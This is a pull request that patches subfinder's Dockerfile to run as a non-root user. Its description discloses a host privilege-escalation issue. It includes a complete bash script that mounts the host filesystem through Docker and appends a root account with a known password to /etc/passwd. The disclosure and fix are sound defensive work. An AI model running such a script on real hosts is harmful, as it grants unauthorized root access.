### PR TITLE
Modify Dockerfile to prevent privilege escalation

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -7,5 +7,9 @@ FROM alpine:latest
 RUN apk -U upgrade --no-cache \
     && apk add --no-cache bind-tools ca-certificates
 COPY --from=build-env /go/bin/subfinder /usr/local/bin/subfinder
-
+RUN addgroup user \
+    && adduser user -D -G user \
+    && mkdir /.config \
+    && chown -R user:user /.config
+USER user
 ENTRYPOINT ["subfinder"]


### PR DESCRIPTION
The Dockerfile in this version (which has been introduced in October 15th 2020 in commit [d2e83f832fb72dca34e4b60a0aac9e9693516490](https://github.com/projectdiscovery/subfinder/commit/d2e83f832fb72dca34e4b60a0aac9e9693516490#diff-dd2c0eb6ea5cfc6c4bd4eac30934e2d5746747af48fef6da689e85b752f39557), and possibly affecting all releases since at least 2.4.6) makes the host system vulnerable to root privilege escalation. I was able to reproduce this exploit with 100% success in multiple instances in a Linux 5.8.0-59-generic #66~20.04.1-Ubuntu system.

The mere fact that a `projectdiscovery/subfinder:latest` docker image is present on the system is enough to leave it open to exploitation. Worse, its existence in a public repository in DockerHub can also be leveraged by any threat agent that compromises a system where Docker is installed with the appropriate permissions in the context of the current user. That can be done by executing the following shell script with a low-privileged user that has permission to execute Docker:

```
#!/bin/bash

# Simple check to verify if the current user has permission to execute Docker
docker_ps=$( docker ps | grep "CONTAINER ID" | cut -d " " -f 1-2 ) 

if [ "$docker_ps" == "CONTAINER ID" ]; then
    rootname=subfinder-privesc
    passwd=subfinder
    hpass=$(openssl passwd -1 -salt mysalt $passwd)

    # Run a detached container that is left "hanging" with the /bin/sh binary and maps the host's root
    # directory to the container's /mnt/ directory
    docker run --name subfinder-privesc --entrypoint /bin/sh -v /:/mnt/ -itd projectdiscovery/subfinder:latest
    
    # Use the running container as a bypass to inject a line on the host's /etc/passwd file by appending it to the 
    # passwd file inside the container's /mnt/etc/ directory
    docker exec -it subfinder-privesc sh -c "echo -e '$rootname:$hpass:0:0:root:/root:/bin/bash' >> /mnt/etc/passwd"    
    
    echo "Privilege escalation completed. Root user $rootname created on the host. Enter the password \"$passwd\" to login as root:"

    docker rm -f subfinder-privesc
    su $rootname

else echo "Your account does not have permission to execute docker or docker is not running. Aborting..."
    exit

fi
```

I found this issue while first attempting to integrate OWASP Amass as a Docker container in a project I'm working on. I needed a JSON output to be written to a volume and noticed that it was successfully written, but by the root user. This led me to the conclusion that the container itself must have been running as root, which was the case. Following that I needed to integrate Subfinder to this same project and extract JSON files as results from the container and, to my surprise, noticed that it suffered from the exact same issue.

The modification I propose seems to be enough to mitigate the problem, but I have tested it with very few commands and there were no problems. More extensive testing is advised, though, if this is to become a production patch.